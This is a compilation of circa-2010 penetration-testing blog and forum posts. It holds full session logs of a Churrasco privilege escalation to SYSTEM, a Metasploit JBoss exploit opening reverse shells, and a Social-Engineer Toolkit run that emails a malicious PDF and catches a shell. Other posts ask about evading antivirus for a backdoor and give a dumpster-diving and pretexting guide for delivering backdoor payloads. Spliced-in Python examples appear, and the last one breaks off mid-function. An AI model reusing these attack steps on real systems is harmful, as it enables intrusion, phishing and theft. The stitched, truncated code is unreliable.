I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...
The gist is you can run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.
Let's see it in action.
We have our network service shell, push up our churrasco binary, metasploit payload, and run it.
*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.
[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv
Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin; network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E
Directory of C:\Inetpub\wwwroot
05/10/2010 06:53 AM .
05/10/2010 06:53 AM ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
on the multi/handler side...
[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)
(C) Copyright 1985-2003 Microsoft Corp.
C:\Inetpub\wwwroot>whoami
whoami
nt authority\system
C:\Inetpub\wwwroot>^Z
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] 192.168.6.94:443 -> 192.168.6.94:62854
2 meterpreter NT AUTHORITY\SYSTEM @ LAB 192.168.6.94:443 -> 192.168.6.94:62855
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
8:24
Carnal0wnage
MC pushed out a new exploit today (jboss_deploymentfilerepository), so while it lists 4.x as vuln, actually several other versions are vulnerable as well, including 6.0.0M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>whoami
whoami
win2k3lab\administrator
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>^Z
Background session 3? [y/N] y
msf exploit(jboss_deploymentfilerepository) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
3 shell 192.168.1.101:4444 -> 192.168.1.101:57796
msf exploit(jboss_deploymentfilerepository) > sessions -u 3
msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010
msf exploit(jboss_deploymentfilerepository) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
3 shell 192.168.1.101:4444 -> 192.168.1.101:57796
4 meterpreter win2k3lab\Administrator @ win2k3lab 192.168.1.101:4444 -> 192.168.1.101:36591
msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: win2k3lab\Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin
meterpreter >
20:22
Carnal0wnage
Layer Four Traceroute (lft)
http://pwhois.org/lft
If you are using the one bundled with your distro you are probably missing out on some of the more interesting and new features.
From the site:
"LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al.
What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method."
It's been useful for me to locate more systems between me and the target host as well as identifying gateways/web firewalls that organizations send all (or some) web traffic through.
It's also handy that you can throw it some switches to show the AS and network routes with the scan as well.
Old Traceroute:
cg@meh:~/evil/lft-3.1$ traceroute www.microsoft.com
traceroute to www.microsoft.com (65.55.21.250), 30 hops max, 60 byte packets
1 192.168.1.1 (192.168.1.1) 4.681 ms 5.794 ms 14.193 ms
2-8 Local Stuff
9 pos-0-0-0-0-pe01.ashburn.va.ibone.comcast.net (68.86.86.26) 35.743 ms 36.391 ms 37.102 ms
10 as8075-1.ashburn.va.ibone.comcast.net (75.149.230.42) 173.747 ms 174.136 ms 175.054 ms
11 209.240.199.162 (209.240.199.162) 32.762 ms 33.703 ms 37.096 ms
12 ge-6-1-0-0.bl2-64c-1a.ntwk.msn.net (207.46.43.5) 17.652 ms 28.151 ms 24.033 ms
13 ge-0-0-0-0.bl2-64c-1b.ntwk.msn.net (207.46.43.85) 24.864 ms 25.951 ms 26.485 ms
14 ge-3-1-0-0.co2-64c-1a.ntwk.msn.net (207.46.43.101) 109.384 ms 109.615 ms 110.180 ms
15 ge-7-0-0-0.co2-64c-1b.ntwk.msn.net (207.46.43.197) 106.607 ms 107.401 ms 110.382 ms
16 207.46.46.92 (207.46.46.92) 112.458 ms 118.682 ms 106.207 ms
17 10.22.8.14 (10.22.8.14) 107.323 ms 107.552 ms 107.789 ms
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * *
Layer Four Traceroute
cg@meh:~/evil/lft-3.1$ sudo lft -rNS www.microsoft.com -d 80
TTL LFT trace to 65.55.21.250:80/tcp
1 [33657] [CMCS] 192.168.1.1 2.3/1.5ms ** [neglected] no reply packets received from TTLs
2 through 8 local stuff
9 [7922] [COMCAST-7922] pos-0-0-0-0-pe01.ashburn.va.ibone.comcast.net (68.86.86.26) 27.2/26.6ms
10 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] as8075-1.ashburn.va.ibone.comcast.net (75.149.230.42) 25.9/24.3ms
11 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 209.240.199.162 15.8/24.3ms
12 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-6-1-0-0.bl2-64c-1a.ntwk.msn.net (207.46.43.5) 34.1/14.8ms
13 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-0-0-0-0.bl2-64c-1b.ntwk.msn.net (207.46.43.85) 16.0/15.9ms
14 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-3-1-0-0.co2-64c-1a.ntwk.msn.net (207.46.43.101) 121.3/98.2ms
15 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-7-0-0-0.co2-64c-1b.ntwk.msn.net (207.46.43.197) 114.1/97.3ms
16 [6067] [ONYX] 207.46.46.92 101.6/99.9ms
17 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 10.22.8.14 99.5/109.5ms
18 [AS?] [Net?] [target open] 65.55.21.250:80 98.5/109.4ms
4:46
remote-exploit & backtrack
This Metasploit module fails to work if I use it over the internet. On a LAN it works pretty well.
Code:
msf exploit(java_ws_arginject_altjvm) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to 95.X.X.X:6113
[*] Started reverse handler on 0.0.0.0:6113
[*] Using URL: hxxp://0.0.0.0:80/
[*] Local IP: hxxp://192.168.0.5:80/
[*] Server started.
[*] Request for "/" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...
[*] Responding to "GET /3QZOcxOo/" request from 95.X.X.X:60576
[*] Sending js detection HTML to 95.X.X.X:60576...
[*] Responding to "GET /3QZOcxOo/uUW6gpQfujicR.shtml" request from 95.X.X.X:61148
[*] Sending JS version HTML to 95.X.X.X:61148...
[*] Responding to WebDAV "OPTIONS /" request from 192.168.0.10:1042
[*] Request for "/3QZOcxOo" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...
[*] Received WebDAV "PROPFIND /3QZOcxOo/" request from 192.168.0.10:1042
[*] Sending directory multistatus for /3QZOcxOo/ ...
[*] Request for "/3QZOcxOo" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...
[*] Received WebDAV "PROPFIND /3QZOcxOo/" request from 192.168.0.10:1042
[*] Sending directory multistatus for /3QZOcxOo/ ...
[*] Received WebDAV "PROPFIND /3QZOcxOo/jvm.dll" request from 192.168.0.10:1042
[*] Sending DLL multistatus for /3QZOcxOo/jvm.dll ...
[*] Responding to "GET /3QZOcxOo/jvm.dll" request from 192.168.0.10:1042
[*] Sending DLL to 192.168.0.10:1042...
[*] Sending stage (748032 bytes) to 95.X.X.X
[*] Meterpreter session 1 opened (192.168.0.5:6113 -> 95.X.X.X:60066) at 2010-05-04 12:47:22 +0100
Same problem as the guy on top (hxxp://blog.metasploit.com/2010/04/java-web-start-argument-injection.html?showComment=1271428170411#c50095338 63542996215).
jduck answered that this results from the WebClient service not running, but in my test case it is definitely running.
WebDAV is switching to the internal IP; maybe this is the problem.
Code:
[*] Responding to WebDAV "OPTIONS /" request from 192.168.0.10:1042
9:01
remote-exploit & backtrack
Hi, do you know where I can edit the VNC injection server settings?
The default settings make a remote VNC connection too slow.
On the client side I tried to connect with xvncviewer, editing compression depth and other options, but it doesn't change.
Thanks ;)
8:59
remote-exploit & backtrack
Hey guys, I can't make metsvc undetected.
I tried to encode it with some crypters but it doesn't work,
so I tried to recompile the source but Avira gets it every time... then I discovered that Avira detects the call to listen() in the code of metsvc and then marks it as a backdoor!
Any suggestion!? What can I do?
Thanks
10:37
remote-exploit & backtrack
Does anyone know of a freely available pcap "attack library" which could be run through TCPreplay? Specifically, I'd like the ability to select either specific individual or multiple simultaneous attacks and send those attacks down the wire.
I've run some searches but haven't come up with anything yet; I thought I would post here before I start building it out myself.
Thanks!
8:36
remote-exploit & backtrack
I'm having a problem updating it.
It says "Error: rsync failed. Your NVT collection might be broken now."
Firewall? I'm using a domain for downloads, and that's blocking me. How can I define the proxy in the Konsole, like I had to do in Firefox?
Ty
0:49
remote-exploit & backtrack
In a pentest scenario we have found an open port for the "3306/tcp open mysql port unauthorized" service.
How can we try to connect to it remotely? What further information can we gain using this information?
18:01
remote-exploit & backtrack
Hey everyone,
I'm a bit new to the use of John the Ripper so please bear with me.
Currently I'm working with wordlist mangling for a class. What I need now is a rule that allows for only some of a single character to be switched.
For example, if I'm using a simple switch rule like this:
so[o0]
it would give me: google, g00gle, etc.
But I need it to also be able to give go0gle, g0ogle, etc.
Are there any rules that can help perform this? Thanks in advance. :)
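The partial-substitution variants asked for above (go0gle, g0ogle, and so on, not only the all-or-nothing g00gle) enumerated in Python. This is an added example, not from the thread: John's `s` rule command (`so0`) replaces every occurrence of the character at once, so the in-between forms are generated as a wordlist here instead; the words and substitution pairs are constructed samples.

```python
"""Enumerate partial character substitutions for wordlist mangling.  Added
example, not from the thread; John's `so0` rule replaces every 'o' at once,
so the in-between forms are generated here instead."""
from itertools import product


def partial_substitutions(word, old, new):
    """Yield every variant of `word` in which any subset of the occurrences of
    `old` is replaced by `new`: 2**n variants for n occurrences, the original
    word included.  google -> google, go0gle, g0ogle, g00gle."""
    positions = [i for i, ch in enumerate(word) if ch == old]
    for choice in product((old, new), repeat=len(positions)):
        chars = list(word)
        for pos, ch in zip(positions, choice):
            chars[pos] = ch
        yield "".join(chars)


def mangle_wordlist(words, pairs=(("o", "0"), ("e", "3"), ("a", "@"))):
    """Apply each (old, new) pair in turn so substitutions compound; duplicates
    are dropped while preserving first-seen order.  The list size grows by
    2**n per pair, which is why partial substitution is usually reserved for
    short, high-value base words in a password-policy audit."""
    current = list(dict.fromkeys(words))
    for old, new in pairs:
        expanded = []
        for w in current:
            expanded.extend(partial_substitutions(w, old, new))
        current = list(dict.fromkeys(expanded))
    return current


if __name__ == "__main__":
    # Constructed sample words; one variant per line, ready to be saved as a
    # wordlist file for the cracker's --wordlist option.
    for variant in mangle_wordlist(["google", "password"]):
        print(variant)
```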
5:33
remote-exploit & backtrack
Hello,
I am trying to use 'auxiliary/admin/oracle/login_brute' in metasploit 3.3 but I am getting the following error.
------
[-] Auxiliary failed: NameError uninitialized constant OCIError
[-] Call stack:
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:434:in `load_missing_constant'
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:80:in `const_missing_with_dependencies'
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:92:in `const_missing'
[-] (eval):55:in `rescue in block in run'
[-] (eval):52:in `block in run'
[-] /usr/lib/ruby/1.9.1/csv.rb:1761:in `each'
[-] /usr/lib/ruby/1.9.1/csv.rb:1197:in `block in foreach'
[-] /usr/lib/ruby/1.9.1/csv.rb:1335:in `open'
[-] /usr/lib/ruby/1.9.1/csv.rb:1196:in `foreach'
[-] (eval):47:in `run'
[*] Auxiliary module execution completed
-----
I have tried the below recommendation for a Windows Server 2003 environment but it is giving the same problem. Please assist. Thanks.
[1]Install subversion client
CollabNetSubversion-client-1.6.9-1.win32.exe
[2]install ruby
ruby186-27_rc2.exe
[3]install ruby-oci8
wget ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb
[4]
svn co metasploit.com/svn/framework3/trunk/ metasploit
cd metasploit
ruby msfconsole (I am not able to execute this command successfully)
18:06
remote-exploit & backtrack
For the last few weeks I've been playing with Metasploit...
I've had fun hacking an old server using the old net_api overflow on XP SP2.
I just read the Metasploit blog about the new adobe_libtiff exploit.
I used the payload
windows/meterpreter/reverse_tcp
(is this right?)
I have the PDF on the target machine; it works A-OK and connects back to my machine on xxx.xxx.xxx.3:1133. My question is....
How do I go from a TCP connection to either a meterpreter session or vncinject using the command line in Ruby?
I've tried:
connect xxx.xxx.xxx.4:1133 ... it connects but then does nothing?
^^^ Do I need to run this as a bg session/job?
Any suggestions please,
& please don't flame me.
15:27
remote-exploit & backtrack
Hello all,
I am trying to get remote access to my main computer on my network using the SET email attack.
However, when I open the PDF I do not get command line access!
See below.
Thanks in advance for the advice,
yoma
Code:
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.
[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 0.4.1 [---]
[---] Codename: 'Rise of the Pink Pirate' [---]
[---] Report bugs to: davek@social-engineer.org [---]
[---] Check out: http://social-engineer.org [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Tutorial: http://offsec.com/metasploit-unleashed [---]
[---] Unpublished Java Applet by: Thomas Werth [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
Select from the menu on what you would like to do:
1. Spear-Phishing (Email) Attacks
2. Website Attack Vectors
3. Update the Metasploit Framework
4. Update the Social-Engineer Toolkit
5. Create a Payload and Listener
6. Help, Credits, and About
7. Exit the Social-Engineer Toolkit
Enter your choice: 1
Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu.
Enter your choice: 1
Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1. Adobe Collab.collectEmailInfo Buffer Overflow
2. Adobe Collab.getIcon Buffer Overflow
3. Adobe JBIG2Decode Memory Corruption Exploit
4. Adobe PDF Embedded EXE Social Engineering
5. Adobe util.printf() Buffer Overflow
6. Custom EXE to VBA (sent via RAR) (RAR required)
7. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
Enter the number you want (press enter for default): 4
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.
1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)
Enter the payload you want (press enter for default): 1
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.3:443
[*] Reading in 'src/msf_attacks/form.pdf'...
[*] Parsing 'src/msf_attacks/form.pdf'...
[*] Parsing Successful.
[*] Using 'windows/shell_reverse_tcp' as payload...
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/SET/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.
As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
Enter your choice: 1
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
Enter your choice: 1
Below is a list of available templates:
1: LOL...have to check this out...
2: Dan Brown's Angels & Demons
3: Baby Pics
4: New Update
5: Computer Issue
6: Status Report
7: Strange internet usage from your computer
Enter the number you want to use: 1
Enter who you want to send email to:(my email)
What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay
Enter your choice: 1
Enter your GMAIL email address: (same email again)
Enter your password for gmail (it will not be displayed back to you):
SET has finished deliverying the emails.
Do you want to setup a listener yes or no: yes
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 535 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8859 updated today (2010.03.20)
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.3
LHOST => 192.168.1.3
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.3:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Command shell session 1 opened (192.168.1.3:443 -> 192.168.1.4:3768)
msf exploit(handler) >
13:05
remote-exploit & backtrack
Note: I haven't made 15 posts yet so the pictures can be found in the distorted URLs.
There is no such thing as irrelevant information ~ Muts
During the information gathering stage (if possible) I visit the target for some reconnaissance work in a process that involves exploration and inference. In this case I examined a telecommunications centre which houses a base transceiver station(cell site) and a virtual switchboard. All of this was done with permission. This is a simple overview of my methodology and the purpose of it is to demonstrate how trifles can turn out to be useful pieces of information.
Gear
1) Gloves: I don't need to explain this one?
2) Knife: For cutting bags
3) Torch: A portable light with a magnifying glass(good for poorly written scribbles)
4) Folder, backpack or plastic bag(I prefer the latter)
5) Digital camera: Indispensable.
h ttp://i41.tinypic.com/16lidko.jpg
Appearance
I usually put on clothes which give me the air of a vagrant but I don't exaggerate it. I'll wear a cheap rain jacket, torn jeans, a hood, and I'll remove my glasses and mess up my goatee beard. This will avail against prying eyes since I'll just look like a bum rummaging the garbage for recyclable materials and/or food. Why is this important? Because I don't want to produce the impression of a document/identity thief.
Garbage
Even in the days of the paper shredder it's very likely you'll find whole documents, letters and all sorts of memorandums. From this we can collect names of employees and customers, phone numbers, email addresses, material on office routines, schedules and so on and so forth. In addition to useful info I can also deduce recent activities. Let's take a look.
h ttp://i41.tinypic.com/k51nao.jpg
Note the abundance of twisted pair cabling that is on top; could this be just old wires? Or perhaps a change in equipment?
Lying below the bag of wiring on the left side I found a box; on it is an address of a seller and manufacturer of computer equipment, and in addition on the post label there is a content description stating "modular connectors". From this I can deduce that they have indeed been improving their network and this could be fodder for a social engineering attack.
h ttp://i44.tinypic.com/2rdztjc.jpg
And finally paper, white gold. I always stress my search for crumpled and/or torn notes.
From all this I found the following:
9 Employee names
More assorted names and phone numbers to count. Customers perhaps?
3 work schedules
A paper with the IPs of local hosts scribbled on them, as well as other connection config info.
A document with electronic consumption measurements.
An employment application.
A crumpled post-it-note with a username and password from a web-app of their site.
An internal "staff only" URL
h ttp://i43.tinypic.com/14nzjte.jpg
The Building
I have an eye open for aberrations, I view this as fodder for social engineering attacks. I also peek inside for anything that could be of use.
h ttp://i39.tinypic.com/s4wi9f.jpg
Trouble with your antenna? Here I'm allowed to draw the conclusion that their TV reception is poor. This could be useful fodder for an SE attack; I could ascertain who's behind their TV service and impersonate a service rep stating that he detects that their television converter box or set-top box is receiving a sub-par signal and thus send them an email containing guidelines on improving their signal. This email could be a vehicle for a backdoor payload or contain links to sham sites on improving the signal or maybe even a manual of whatever set-top unit they are using. Remember, being elaborate is a key element.
h ttp://i43.tinypic.com/8zpahg.jpg
May not be clear on photo but they are all running Win XP Pro. Earlier that evening I saw that the monitor at the anterior was displaying the latest version of Internet Explorer and MSN messenger.
h ttp://i44.tinypic.com/140ygi1.jpg
Now I know who is providing security.
h ttp://i42.tinypic.com/35d2rmb.jpg
Hmm... vandalism? maybe they are not doing such a good job. Here I can make a telephone call or send a sham email from a competing security guard services provider or maybe even send an email from Securitas themselves and use the vandalism examples as a basis for a proposition for increased patrolling and in the process implement an attack similar to the one with the antenna problem.
h ttp://i42.tinypic.com/9idyk4.jpg
The lights are turned on at 3:00 in the morning?
Nice, a whiteboard. Here I learnt important topics which are evidently under discussion at this business. In this case they were looking for buyers for a telephone directory service. This is something which I could avail myself of, such as shammed interest in this product as a pretext to gain more info or maybe even access(which I eventually did).
Conclusion
In just 30 minutes I acquired a good chunk of information without any key strokes, which aided me very well later on in the attack. I am happy to announce that I successfully penetrated several computers at this company using mostly what I observed on the physical site. I did propose to them the following solutions:
1. Use paper shredders
2. Turn your damn lights off.
3. Be more circumspect with phone calls and emails pertaining to problems visible from the outside.
If you live in the same or an adjacent city you could give this a try. It's quite a thrill.
15:17
remote-exploit & backtrack
I have a client with an older Fedora box. They allow external connections via the built in remote desktop sharing (vino-server). I've been asked to audit the vnc connections to the box for the past 3 months.
I didn't set up the machine so I'm not sure what options have been set up for logging. Does anyone know if there are any default vnc logs or where I can start looking for connection logs to port 5900?
Thanks in advance.
0:53
remote-exploit & backtrack
hi,
MS10-002, ie_iepeers (Microsoft Internet Explorer iepeers.dll use-after-free exploit)
4xsecurityteam.blogspot(dot)com (home page)
4xunderground.blogspot(dot)com
vimeo(dot)com/user1010000
thk$
15:33
remote-exploit & backtrack
Hey guys, I have seen lots of documents about how to hack and I've tried many exploits on my test server (HP ProLiant DL380 G3 I got off eBay :D). But I've never tried rooting it before :S I looked around Google but only found outdated papers from the 90s lol. I have seen webshells like c99 and r57, with options like "connect back" and "bind shell". I've looked into it and found that for "connect back" you have to port forward if it's a remote host connecting to you, but not if it's a LAN. "Bind shell" is me doing "nc <ip> <port>", which is usually blocked by firewalls?
So people say "connect back" shells are the best, but don't they show your IP address? Also I've heard of data pipe shells, which have something to do with IRC?
Could someone educate me some more please :D
8:29
remote-exploit & backtrack
What does --threads [num] mean when using the option? I've searched for a while and I can't find anything!!! :o
12:40
remote-exploit & backtrack
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 1 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
Exploit target:
Id Name
-- ----
0 Automatic Targeting
How can I manually select the version of it + language?
My second question is: how do I run the GUI of Metasploit in Windows?
Thanks.
3:51
remote-exploit & backtrack
Hi,
Last week I decided to check if my network was secure "enough". I got my WPA Handshake within seconds (which is quite acceptable). I then got down to trying to crack it.
I used all the dictionaries I could get my hands on to try and brute-force my way in but found nothing. So far so good. But I still wasn't convinced.
Through some social engineering, and after a few pints of lager, I tricked myself into telling me that the password was made of a 10-digit mixture of letters and numbers. I therefore tried a different way:
/pentest/password/crunch 10 10 "abcdefghijkl.......1234567890" | aircrack-ng ..... wpa-01.cap
After something like 4 days of scanning 385 keys/second it had barely just started the 3rd digit. This made me feel a lot safer.
Question: Are there "faster" ways other than crunch to get to a 10-digit password by checking every possible permutation, or may I assume that no one is going to have the time to crack my password (at least for the next few hundred years)?
Thanks
17:17
remote-exploit & backtrack
I am trying to crack an administrator password on a Windows XP 40 GB hard drive and everything goes well until /mnt/sda1/windows.
I checked in Konqueror and can navigate to /mnt/sda1/ but no files are shown. I know there are files there because I can boot into xp just fine. . .
Any suggestions?
15:54
remote-exploit & backtrack
Hello, I posted this in the OffSec PWB forum, but I don't think it's frequented that often hence no response. Apologies for the re-post if you've already come across this.
I've been doing some research into TCP wrappers recently, having noticed that a few services within the PWB lab are wrapped. As I understand it, TCP wrappers are a method of applying an ACL to a service, based on IP address.
I've figured out that I can only talk to wrapped services if I'm bouncing through another host, but is there a reliable way of determining which hosts are in the ACL? The only ideas I've had on this so far seem to require some cache poisoning, which seems more than likely to mess things up (and poisoning is not allowed in the labs anyway!).
Spoofing my source address could be an option I suppose, but that would mean responses are directed elsewhere I guess...
Can anyone share any insights into this? Even a nudge in the right direction would be appreciated.
Thanks
Chris
21:52
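An added example for the TCP wrappers question above (this is editor's code, not from the post or from the PWB lab). The hosts.allow/hosts.deny contents are only readable on the box itself; what you can observe remotely is the wrapper's behaviour: the TCP handshake completes, so the port looks open, then libwrap/tcpd checks your source address and closes the connection before the real daemon sends a byte. Nmap labels exactly that pattern "tcpwrapped", and by repeating the probe from different source hosts you learn which sources the ACL admits. The two local servers, the "SSH-2.0-demo" banner and the port choices are constructed so the script runs offline.

```python
"""Added example: classify a port as closed, filtered, open-with-banner,
open-but-silent or tcpwrapped from the attacker's side of the connection.
Servers and banner below are constructed stand-ins, not real daemons."""
import socket
import threading


def classify_port(host: str, port: int, timeout: float = 2.0) -> str:
    """Connect and read the first bytes; what comes back (or doesn't) is the tell."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        return "closed"                   # RST to our SYN: nothing listening
    except (socket.timeout, OSError):
        return "filtered"                 # no answer at all: something is dropping packets
    try:
        data = s.recv(1024)
    except socket.timeout:
        return "open-silent"              # accepted and held open: a client-speaks-first protocol
    except ConnectionResetError:
        return "tcpwrapped"               # accepted, then reset before any banner
    finally:
        s.close()
    if not data:
        return "tcpwrapped"               # accepted, then FIN with no banner: the wrapper denied us
    return "open:" + data.decode(errors="replace").strip()


def start_server(handler) -> int:
    """Bind a throwaway loopback server, serve one connection in a thread, return its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        try:
            handler(conn)
        finally:
            conn.close()
            srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def free_port() -> int:
    """A loopback port nothing is listening on (bind, note the number, release it)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
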